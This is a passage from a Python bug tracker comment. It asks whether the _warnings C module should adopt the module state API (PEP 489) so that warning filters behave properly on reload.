doesn't use the "module state" API. I don't see how you want to trigger an action in the _warnings module itself when it is "reloaded". Filteres are used internally in the _warnings C module. Maybe we need to enhance the _warnings C module to use the "module state" API? (Is it the PEP 489?)
https://bugs.python.org/issue28688
CC-MAIN-2021-49
refinedweb
1,151
68.97